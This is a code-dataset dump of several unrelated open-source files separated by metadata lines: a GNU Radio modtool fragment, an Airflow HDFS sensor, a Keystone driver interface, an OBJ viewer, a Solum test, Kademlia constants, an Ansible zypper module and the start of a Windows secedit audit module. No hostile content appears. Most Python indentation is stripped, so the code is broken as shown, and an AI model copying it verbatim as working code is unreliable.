# Don't call ModTool.setup(), that assumes an existing module.
self._info['modname'] = options.module_name
if self._info['modname'] is None:
if len(args) >= 2:
self._info['modname'] = args[1]
else:
self._info['modname'] = raw_input('Name of the new module: ')
if not re.match('[a-zA-Z0-9_]+$', self._info['modname']):
raise ModToolException('Invalid module name.')
self._dir = options.directory
if self._dir == '.':
self._dir = './gr-%s' % self._info['modname']
try:
os.stat(self._dir)
except OSError:
pass # This is what should happen
else:
raise ModToolException('The given directory exists.')
if options.srcdir is None:
options.srcdir = '/usr/local/share/gnuradio/modtool/gr-newmod'
self._srcdir = gr.prefs().get_string('modtool', 'newmod_path', options.srcdir)
if not os.path.isdir(self._srcdir):
raise ModToolException('Could not find gr-newmod source dir.')
self.options = options
self._setup_scm(mode='new')
def run(self):
"""
* Copy the example dir recursively
* Open all files, rename howto and HOWTO to the module name
* Rename files and directories that contain the word howto
"""
print "Creating out-of-tree module in %s..." % self._dir,
try:
shutil.copytree(self._srcdir, self._dir)
os.chdir(self._dir)
except OSError:
raise ModToolException('Could not create directory %s.' % self._dir)
for root, dirs, files in os.walk('.'):
for filename in files:
f = os.path.join(root, filename)
s = open(f, 'r').read()
s = s.replace('howto', self._info['modname'])
s = s.replace('HOWTO', self._info['modname'].upper())
open(f, 'w').write(s)
if filename.find('howto') != -1:
os.rename(f, os.path.join(root, filename.replace('howto', self._info['modname'])))
if os.path.basename(root) == 'howto':
os.rename(root, os.path.join(os.path.dirname(root), self._info['modname']))
print "Done."
if self.scm.init_repo(path_to_repo="."):
print "Created repository... you might want to commit before continuing."
print "Use 'gr_modtool add' to add a new block to this currently empty module."
| gpl-3.0 | -72,103,753,874,746,850 | 40.72549 | 103 | 0.611607 | false |
Acehaidrey/incubator-airflow | airflow/providers/apache/hdfs/sensors/hdfs.py | 2 | 7151 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import re
import sys
from typing import Any, Dict, List, Optional, Pattern, Type
from airflow import settings
from airflow.providers.apache.hdfs.hooks.hdfs import HDFSHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
log = logging.getLogger(__name__)
class HdfsSensor(BaseSensorOperator):
"""Waits for a file or folder to land in HDFS"""
template_fields = ('filepath',)
ui_color = settings.WEB_COLORS['LIGHTBLUE']
@apply_defaults
def __init__(
self,
*,
filepath: str,
hdfs_conn_id: str = 'hdfs_default',
ignored_ext: Optional[List[str]] = None,
ignore_copying: bool = True,
file_size: Optional[int] = None,
hook: Type[HDFSHook] = HDFSHook,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
if ignored_ext is None:
ignored_ext = ['_COPYING_']
self.filepath = filepath
self.hdfs_conn_id = hdfs_conn_id
self.file_size = file_size
self.ignored_ext = ignored_ext
self.ignore_copying = ignore_copying
self.hook = hook
@staticmethod
def filter_for_filesize(result: List[Dict[Any, Any]], size: Optional[int] = None) -> List[Dict[Any, Any]]:
"""
        Filter the ls results on file size.

        :param result: a list of dicts returned by Snakebite ls
        :param size: the minimum file size in MB a file must have to be kept
        :return: (list) the dicts for files that pass the size filter
"""
if size:
log.debug('Filtering for file size >= %s in files: %s', size, map(lambda x: x['path'], result))
size *= settings.MEGABYTE
result = [x for x in result if x['length'] >= size]
log.debug('HdfsSensor.poke: after size filter result is %s', result)
return result
@staticmethod
def filter_for_ignored_ext(
result: List[Dict[Any, Any]], ignored_ext: List[str], ignore_copying: bool
) -> List[Dict[Any, Any]]:
"""
        If instructed to do so, filter the result to remove files matching the ignored extensions
:param result: list of dicts returned by Snakebite ls
:type result: list[dict]
:param ignored_ext: list of ignored extensions
:type ignored_ext: list
        :param ignore_copying: whether to filter out files that are still being copied
:type ignore_copying: bool
:return: list of dicts which were not removed
:rtype: list[dict]
"""
if ignore_copying:
regex_builder = r"^.*\.(%s$)$" % '$|'.join(ignored_ext)
ignored_extensions_regex = re.compile(regex_builder)
log.debug(
'Filtering result for ignored extensions: %s in files %s',
ignored_extensions_regex.pattern,
map(lambda x: x['path'], result),
)
result = [x for x in result if not ignored_extensions_regex.match(x['path'])]
log.debug('HdfsSensor.poke: after ext filter result is %s', result)
return result
def poke(self, context: Dict[Any, Any]) -> bool:
"""Get a snakebite client connection and check for file."""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
self.log.info('Poking for file %s', self.filepath)
try:
            # IMO it's not right here, as there is no raise of any kind.
# if the filepath is let's say '/data/mydirectory',
# it's correct but if it is '/data/mydirectory/*',
# it's not correct as the directory exists and sb_client does not raise any error
# here is a quick fix
result = sb_client.ls([self.filepath], include_toplevel=False)
self.log.debug('HdfsSensor.poke: result is %s', result)
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
return bool(result)
except Exception: # pylint: disable=broad-except
e = sys.exc_info()
self.log.debug("Caught an exception !: %s", str(e))
return False
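# A minimal usage sketch; the task id, file path and connection id below are
# placeholders, not values required by this module:
#
#   wait_for_data = HdfsSensor(
#       task_id="wait_for_data",
#       filepath="/data/incoming/_SUCCESS",
#       hdfs_conn_id="hdfs_default",
#   )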
class HdfsRegexSensor(HdfsSensor):
"""Waits for matching files by matching on regex"""
def __init__(self, regex: Pattern[str], *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.regex = regex
def poke(self, context: Dict[Any, Any]) -> bool:
"""
Poke matching files in a directory with self.regex
:return: Bool depending on the search criteria
"""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
self.log.info(
'Poking for %s to be a directory with files matching %s', self.filepath, self.regex.pattern
)
result = [
f
for f in sb_client.ls([self.filepath], include_toplevel=False)
if f['file_type'] == 'f' and self.regex.match(f['path'].replace('%s/' % self.filepath, ''))
]
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
return bool(result)
class HdfsFolderSensor(HdfsSensor):
"""Waits for a non-empty directory"""
def __init__(self, be_empty: bool = False, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
self.be_empty = be_empty
def poke(self, context: Dict[str, Any]) -> bool:
"""
Poke for a non empty directory
:return: Bool depending on the search criteria
"""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
result = sb_client.ls([self.filepath], include_toplevel=True)
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
if self.be_empty:
self.log.info('Poking for filepath %s to a empty directory', self.filepath)
return len(result) == 1 and result[0]['path'] == self.filepath
else:
self.log.info('Poking for filepath %s to a non empty directory', self.filepath)
result.pop(0)
return bool(result) and result[0]['file_type'] == 'f'
| apache-2.0 | -5,695,859,827,206,844,000 | 40.097701 | 110 | 0.620892 | false |
jiwanlimbu/aura | keystone/identity/shadow_backends/base.py | 3 | 2845 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from keystone import exception
@six.add_metaclass(abc.ABCMeta)
class ShadowUsersDriverBase(object):
"""Interface description for an Shadow Users driver."""
@abc.abstractmethod
def create_federated_user(self, domain_id, federated_dict):
"""Create a new user with the federated identity.
:param domain_id: The domain ID of the IdP used for the federated user
:param dict federated_dict: Reference to the federated user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_user(self, idp_id, protocol_id, unique_id):
"""Return the found user for the federated identity.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def update_federated_user_display_name(self, idp_id, protocol_id,
unique_id, display_name):
"""Update federated user's display name if changed.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:param display_name: The user's display name
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_user(self, user_id):
"""Return the found user.
:param user_id: Unique identifier of the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_nonlocal_user(self, user_dict):
"""Create a new non-local user.
:param dict user_dict: Reference to the non-local user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def set_last_active_at(self, user_id):
"""Set the last active at date for the user.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
| apache-2.0 | -1,451,795,136,754,261,500 | 30.966292 | 78 | 0.669947 | false |
jennifersalas/3D_CA | objefileviewer.py | 1 | 2135 | # Basic OBJ file viewer. needs objloader from:
# http://www.pygame.org/wiki/OBJFileLoader
# LMB + move: rotate
# RMB + move: pan
# Scroll wheel: zoom in/out
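# Usage sketch (the model path is only an example): python objefileviewer.py model.obj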
import sys, pygame
from pygame.locals import *
from pygame.constants import *
from OpenGL.GL import *
from OpenGL.GLU import *
# IMPORT OBJECT LOADER
from objloader import *
pygame.init()
viewport = (800, 600)
# hx = viewport[0]/2
# hy = viewport[1]/2
srf = pygame.display.set_mode(viewport, OPENGL | DOUBLEBUF)
glLightfv(GL_LIGHT0, GL_POSITION, (-40, 2000, 1000, 0.0))
glLightfv(GL_LIGHT0, GL_AMBIENT, (0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.5, 0.5, 0.5, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH) # most obj files expect to be smooth-shaded
# LOAD OBJECT AFTER PYGAME INIT
obj = OBJ(sys.argv[1], swapyz=False)
clock = pygame.time.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
width, height = viewport
gluPerspective(90.0, width/float(height), 1, 100.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_MODELVIEW)
rx, ry = (0,0)
tx, ty = (0,0)
zpos = 5
rotate = move = False
while 1:
clock.tick(30)
for e in pygame.event.get():
if e.type == QUIT:
sys.exit()
elif e.type == KEYDOWN and e.key == K_ESCAPE:
sys.exit()
elif e.type == MOUSEBUTTONDOWN:
if e.button == 4: zpos = max(1, zpos-1)
elif e.button == 5: zpos += 1
elif e.button == 1: rotate = True
elif e.button == 3: move = True
elif e.type == MOUSEBUTTONUP:
if e.button == 1: rotate = False
elif e.button == 3: move = False
elif e.type == MOUSEMOTION:
i, j = e.rel
if rotate:
rx += i
ry += j
if move:
tx += i
ty -= j
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
# RENDER OBJECT
glTranslate(tx/20., ty/20., - zpos)
glRotate(ry, 1, 0, 0)
glRotate(rx, 0, 1, 0)
glCallList(obj.gl_list)
pygame.display.flip()
| agpl-3.0 | 1,352,245,264,052,173,600 | 26.025316 | 77 | 0.600468 | false |
stackforge/solum | solum/tests/api/camp/test_camp_v1_1_endpoint.py | 2 | 1330 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from solum.api.controllers.camp import camp_v1_1_endpoint
from solum import objects
from solum.tests import base
from solum.tests import fakes
@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)
@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)
class TestCAMPEndpoint(base.BaseTestCase):
def setUp(self):
super(TestCAMPEndpoint, self).setUp()
objects.load()
def test_camp_endpoint_get(self, resp_mock, request_mock):
cont = camp_v1_1_endpoint.CAMPv11EndpointController()
resp = cont.get()
self.assertEqual(200, resp_mock.status)
self.assertEqual('platform_endpoint', resp['result'].type)
self.assertEqual(camp_v1_1_endpoint.NAME_STRING, resp['result'].name)
| apache-2.0 | -2,591,464,329,070,112,000 | 39.30303 | 77 | 0.741353 | false |
STRML/OpenBazaar | node/constants.py | 3 | 1485 | # ######## KADEMLIA CONSTANTS ###########
BIT_NODE_ID_LEN = 160
HEX_NODE_ID_LEN = BIT_NODE_ID_LEN // 4
# Small number representing the degree of
# parallelism in network calls
alpha = 3
# Maximum number of contacts stored in a bucket
# NOTE: Should be an even number.
k = 80
# Maximum number of contacts stored in the
# replacement cache of a bucket
# NOTE: Should be an even number.
cache_k = 80
# Timeout for network operations
# [seconds]
rpcTimeout = 0.1
# Delay between iterations of iterative node lookups
# (for loose parallelism)
# [seconds]
iterativeLookupDelay = rpcTimeout / 2
# If a k-bucket has not been used for this amount of time, refresh it.
# [seconds]
refreshTimeout = 60 * 60 * 1000 # 1 hour
# The interval at which nodes replicate (republish/refresh)
# the data they hold
# [seconds]
replicateInterval = refreshTimeout
# The time it takes for data to expire in the network;
# the original publisher of the data will also republish
# the data at this time if it is still valid
# [seconds]
dataExpireTimeout = 86400 # 24 hours
# ####### IMPLEMENTATION-SPECIFIC CONSTANTS ###########
# The interval in which the node should check whether any buckets
# need refreshing or whether any data needs to be republished
# [seconds]
checkRefreshInterval = refreshTimeout / 5
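# For reference, the derived values above work out to (plain arithmetic):
#   iterativeLookupDelay = 0.1 / 2 = 0.05
#   replicateInterval = refreshTimeout = 60 * 60 * 1000 = 3600000
#   checkRefreshInterval = refreshTimeout / 5 = 720000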
# Max size of a single UDP datagram.
# Any larger message will be spread accross several UDP packets.
# [bytes]
udpDatagramMaxSize = 8192 # 8 KB
DB_PATH = "db/ob.db"
VERSION = "0.3.0"
| mit | 2,030,193,322,990,321,700 | 25.517857 | 70 | 0.723906 | false |
halberom/ansible-modules-extras | packaging/os/zypper.py | 6 | 13421 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <[email protected]>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <[email protected]>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from xml.dom.minidom import parseString as parseXML
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
- "Thomas O'Donnell (@andytom)"
- "Robin Roth (@robinro)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
        - Package name or package specifier with version C(name) or C(name-1.0). You can also pass a URL or a local path to an rpm file. When using state=latest, this can be '*', which updates all installed packages.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage, application ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
        - Whether to disable the GPG signature checking of the package
          being installed. Has an effect only if state is
          I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
disable_recommends:
version_added: "1.8"
description:
        - Corresponds to the C(--no-recommends) option for I(zypper). The default (C(yes)) prevents recommended packages from being installed; C(no) installs recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
force:
version_added: "2.2"
description:
        - Adds C(--force) option to I(zypper). Allows downgrading packages and changing vendor or architecture.
required: false
default: "no"
choices: [ "yes", "no" ]
# informational: requirements for nodes
requirements:
- "zypper >= 1.0 # included in openSuSE >= 11.1 or SuSE Linux Enterprise Server/Desktop >= 11.0"
- rpm
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Apply a given patch
- zypper: name=openSUSE-2016-128 state=present type=patch
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
# Update all packages
- zypper: name=* state=latest
# Apply all available patches
- zypper: name=* state=latest type=patch
'''
def get_want_state(m, names, remove=False):
packages_install = []
packages_remove = []
urls = []
for name in names:
if '://' in name or name.endswith('.rpm'):
urls.append(name)
elif name.startswith('-') or name.startswith('~'):
packages_remove.append(name[1:])
elif name.startswith('+'):
packages_install.append(name[1:])
else:
if remove:
packages_remove.append(name)
else:
packages_install.append(name)
return packages_install, packages_remove, urls
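# Illustrative sketch (not executed by the module): given the prefix rules above, a
# hypothetical call such as
#   get_want_state(module, ['+apache2', '-nmap', 'vim', 'http://example.com/x.rpm'])
# would be expected to return
#   (['apache2', 'vim'], ['nmap'], ['http://example.com/x.rpm'])
# The package names and URL are made-up placeholders, not values from this module.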
def get_installed_state(m, packages):
"get installed state of packages"
cmd = get_cmd(m, 'search')
cmd.extend(['--match-exact', '--verbose', '--installed-only'])
cmd.extend(packages)
return parse_zypper_xml(m, cmd, fail_not_found=False)[0]
def parse_zypper_xml(m, cmd, fail_not_found=True, packages=None):
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
dom = parseXML(stdout)
if rc == 104:
# exit code 104 is ZYPPER_EXIT_INF_CAP_NOT_FOUND (no packages found)
if fail_not_found:
errmsg = dom.getElementsByTagName('message')[-1].childNodes[0].data
m.fail_json(msg=errmsg, rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
else:
return {}, rc, stdout, stderr
elif rc in [0, 106, 103]:
# zypper exit codes
# 0: success
# 106: signature verification failed
# 103: zypper was upgraded, run same command again
        firstrun = packages is None
        if firstrun:
            packages = {}
solvable_list = dom.getElementsByTagName('solvable')
for solvable in solvable_list:
name = solvable.getAttribute('name')
packages[name] = {}
packages[name]['version'] = solvable.getAttribute('edition')
packages[name]['oldversion'] = solvable.getAttribute('edition-old')
status = solvable.getAttribute('status')
packages[name]['installed'] = status == "installed"
packages[name]['group'] = solvable.parentNode.nodeName
if rc == 103 and firstrun:
# if this was the first run and it failed with 103
# run zypper again with the same command to complete update
return parse_zypper_xml(m, cmd, fail_not_found=fail_not_found, packages=packages)
return packages, rc, stdout, stderr
    m.fail_json(msg='Zypper run command failed with return code %s.' % rc, rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
def get_cmd(m, subcommand):
"puts together the basic zypper command arguments with those passed to the module"
is_install = subcommand in ['install', 'update', 'patch']
cmd = ['/usr/bin/zypper', '--quiet', '--non-interactive', '--xmlout']
# add global options before zypper command
if is_install and m.params['disable_gpg_check']:
cmd.append('--no-gpg-checks')
cmd.append(subcommand)
if subcommand != 'patch':
cmd.extend(['--type', m.params['type']])
if m.check_mode and subcommand != 'search':
cmd.append('--dry-run')
if is_install:
cmd.append('--auto-agree-with-licenses')
if m.params['disable_recommends']:
cmd.append('--no-recommends')
if m.params['force']:
cmd.append('--force')
return cmd
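# Illustrative sketch (assuming the module defaults and no check mode): a call like
# get_cmd(module, 'install') would be expected to build roughly
#   ['/usr/bin/zypper', '--quiet', '--non-interactive', '--xmlout',
#    'install', '--type', 'package', '--auto-agree-with-licenses', '--no-recommends']
# with --no-gpg-checks, --dry-run and --force appended only when the matching
# module options are set.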
def set_diff(m, retvals, result):
packages = {'installed': [], 'removed': [], 'upgraded': []}
for p in result:
group = result[p]['group']
if group == 'to-upgrade':
versions = ' (' + result[p]['oldversion'] + ' => ' + result[p]['version'] + ')'
packages['upgraded'].append(p + versions)
elif group == 'to-install':
packages['installed'].append(p)
elif group == 'to-remove':
packages['removed'].append(p)
output = ''
for state in packages:
if packages[state]:
output += state + ': ' + ', '.join(packages[state]) + '\n'
if 'diff' not in retvals:
retvals['diff'] = {}
if 'prepared' not in retvals['diff']:
retvals['diff']['prepared'] = output
else:
retvals['diff']['prepared'] += '\n' + output
def package_present(m, name, want_latest):
"install and update (if want_latest) the packages in name_install, while removing the packages in name_remove"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
name_install, name_remove, urls = get_want_state(m, name)
if not want_latest:
# for state=present: filter out already installed packages
prerun_state = get_installed_state(m, name_install + name_remove)
# generate lists of packages to install or remove
name_install = [p for p in name_install if p not in prerun_state]
name_remove = [p for p in name_remove if p in prerun_state]
if not name_install and not name_remove and not urls:
# nothing to install/remove and nothing to update
return retvals
# zypper install also updates packages
cmd = get_cmd(m, 'install')
cmd.append('--')
cmd.extend(urls)
# allow for + or - prefixes in install/remove lists
# do this in one zypper run to allow for dependency-resolution
# for example "-exim postfix" runs without removing packages depending on mailserver
cmd.extend(name_install)
cmd.extend(['-%s' % p for p in name_remove])
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
# installed all packages successfully
# checking the output is not straight-forward because zypper rewrites 'capabilities'
# could run get_installed_state and recheck, but this takes time
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
# return retvals
if m._diff:
set_diff(m, retvals, result)
return retvals
def package_update_all(m, do_patch):
"run update or patch on all available packages"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
if do_patch:
cmdname = 'patch'
else:
cmdname = 'update'
cmd = get_cmd(m, cmdname)
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
if m._diff:
set_diff(m, retvals, result)
return retvals
def package_absent(m, name):
"remove the packages in name"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
# Get package state
name_install, name_remove, urls = get_want_state(m, name, remove=True)
if name_install:
m.fail_json(msg="Can not combine '+' prefix with state=remove/absent.")
if urls:
m.fail_json(msg="Can not remove via URL.")
if m.params['type'] == 'patch':
m.fail_json(msg="Can not remove patches.")
prerun_state = get_installed_state(m, name_remove)
name_remove = [p for p in name_remove if p in prerun_state]
if not name_remove:
return retvals
cmd = get_cmd(m, 'remove')
cmd.extend(name_remove)
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
# removed packages successfully
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
if m._diff:
set_diff(m, retvals, result)
return retvals
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, aliases=['pkg'], type='list'),
state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage', 'application']),
disable_gpg_check = dict(required=False, default='no', type='bool'),
disable_recommends = dict(required=False, default='yes', type='bool'),
force = dict(required=False, default='no', type='bool'),
),
supports_check_mode = True
)
name = module.params['name']
state = module.params['state']
# Perform requested action
if name == ['*'] and state == 'latest':
if module.params['type'] == 'package':
retvals = package_update_all(module, False)
elif module.params['type'] == 'patch':
retvals = package_update_all(module, True)
else:
if state in ['absent', 'removed']:
retvals = package_absent(module, name)
elif state in ['installed', 'present', 'latest']:
retvals = package_present(module, name, state == 'latest')
failed = retvals['failed']
del retvals['failed']
if failed:
module.fail_json(msg="Zypper run failed.", **retvals)
if not retvals['changed']:
del retvals['stdout']
del retvals['stderr']
module.exit_json(name=name, state=state, **retvals)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 8,136,235,898,409,910,000 | 34.981233 | 215 | 0.615602 | false |
madchills/hubble | hubblestack/files/hubblestack_nova/win_secedit.py | 1 | 15598 | # -*- encoding: utf-8 -*-
'''
:maintainer: HubbleStack / madchills
:maturity: 2016.7.0
:platform: Windows
:requires: SaltStack
'''
from __future__ import absolute_import
import copy
import fnmatch
import logging
import salt.utils
from pprint import pprint
try:
import codecs
import uuid
HAS_WINDOWS_MODULES = True
except ImportError:
HAS_WINDOWS_MODULES = False
log = logging.getLogger(__name__)
__virtualname__ = 'win_secedit'
def __virtual__():
if not salt.utils.is_windows() or not HAS_WINDOWS_MODULES:
return False, 'This audit module only runs on windows'
return True
def audit(data_list, tags, debug=False):
'''
Runs secedit on the local machine and audits the return data
    against the CIS yaml profiles passed in via data_list
'''
__data__ = {}
__secdata__ = _secedit_export()
__sidaccounts__ = _get_account_sid()
for profile, data in data_list:
_merge_yaml(__data__, data, profile)
__tags__ = _get_tags(__data__)
if debug:
log.debug('secedit audit __data__:')
log.debug(__data__)
log.debug('secedit audit __tags__:')
log.debug(__tags__)
ret = {'Success': [], 'Failure': [], 'Controlled': []}
for tag in __tags__:
if fnmatch.fnmatch(tag, tags):
for tag_data in __tags__[tag]:
if 'control' in tag_data:
ret['Controlled'].append(tag_data)
continue
name = tag_data['name']
audit_type = tag_data['type']
output = tag_data['match_output'].lower()
# Blacklisted audit (do not include)
if audit_type == 'blacklist':
if 'no one' in output:
if name not in __secdata__:
ret['Success'].append(tag_data)
else:
ret['Failure'].append(tag_data)
else:
if name in __secdata__:
secret = _translate_value_type(__secdata__[name], tag_data['value_type'], tag_data['match_output'])
if secret:
ret['Failure'].append(tag_data)
else:
ret['Success'].append(tag_data)
# Whitelisted audit (must include)
if audit_type == 'whitelist':
if name in __secdata__:
sec_value = __secdata__[name]
tag_data['found_value'] = sec_value
if 'MACHINE\\' in name:
match_output = _reg_value_translator(tag_data['match_output'])
else:
match_output = tag_data['match_output']
if ',' in sec_value and '\\' in sec_value:
sec_value = sec_value.split(',')
match_output = match_output.split(',')
if 'account' in tag_data['value_type']:
secret = _translate_value_type(sec_value, tag_data['value_type'], match_output, __sidaccounts__)
else:
secret = _translate_value_type(sec_value, tag_data['value_type'], match_output)
if secret:
ret['Success'].append(tag_data)
else:
ret['Failure'].append(tag_data)
else:
log.error('name {} was not in __secdata__'.format(name))
ret['Failure'].append(tag_data)
return ret
def _merge_yaml(ret, data, profile=None):
'''
Merge two yaml dicts together at the secedit:blacklist and
secedit:whitelist level
'''
if __virtualname__ not in ret:
ret[__virtualname__] = {}
for topkey in ('blacklist', 'whitelist'):
if topkey in data.get(__virtualname__, {}):
if topkey not in ret[__virtualname__]:
ret[__virtualname__][topkey] = []
for key, val in data[__virtualname__][topkey].iteritems():
if profile and isinstance(val, dict):
val['nova_profile'] = profile
ret[__virtualname__][topkey].append({key: val})
return ret
def _get_tags(data):
'''
Retrieve all the tags for this distro from the yaml
'''
ret = {}
distro = __grains__.get('osfullname')
for toplist, toplevel in data.get(__virtualname__, {}).iteritems():
# secedit:whitelist
for audit_dict in toplevel:
for audit_id, audit_data in audit_dict.iteritems():
# secedit:whitelist:PasswordComplexity
tags_dict = audit_data.get('data', {})
# secedit:whitelist:PasswordComplexity:data
tags = None
for osfinger in tags_dict:
if osfinger == '*':
continue
osfinger_list = [finger.strip() for finger in osfinger.split(',')]
for osfinger_glob in osfinger_list:
if fnmatch.fnmatch(distro, osfinger_glob):
tags = tags_dict.get(osfinger)
break
if tags is not None:
break
# If we didn't find a match, check for a '*'
if tags is None:
tags = tags_dict.get('*', [])
# secedit:whitelist:PasswordComplexity:data:Server 2012
if isinstance(tags, dict):
# malformed yaml, convert to list of dicts
tmp = []
for name, tag in tags.iteritems():
tmp.append({name: tag})
tags = tmp
for item in tags:
for name, tag in item.iteritems():
tag_data = {}
# Whitelist could have a dictionary, not a string
if isinstance(tag, dict):
tag_data = copy.deepcopy(tag)
tag = tag_data.pop('tag')
if tag not in ret:
ret[tag] = []
formatted_data = {'name': name,
'tag': tag,
'module': 'win_secedit',
'type': toplist}
formatted_data.update(tag_data)
formatted_data.update(audit_data)
formatted_data.pop('data')
ret[tag].append(formatted_data)
return ret
def _secedit_export():
    '''Helper function that creates (dumps) a secedit inf file under
    C:/ProgramData, parses it into a dictionary, and deletes the file on
    completion. Should only be called once.'''
dump = "C:\ProgramData\{}.inf".format(uuid.uuid4())
try:
ret = __salt__['cmd.run']('secedit /export /cfg {0}'.format(dump))
if ret:
secedit_ret = _secedit_import(dump)
ret = __salt__['file.remove'](dump)
return secedit_ret
except StandardError:
log.debug('Error occurred while trying to get / export secedit data')
return False, None
def _secedit_import(inf_file):
'''This function takes the inf file that SecEdit dumps
and returns a dictionary'''
sec_return = {}
with codecs.open(inf_file, 'r', encoding='utf-16') as f:
for line in f:
line = str(line).replace('\r\n', '')
if not line.startswith('[') and not line.startswith('Unicode'):
if line.find(' = ') != -1:
k, v = line.split(' = ')
sec_return[k] = v
else:
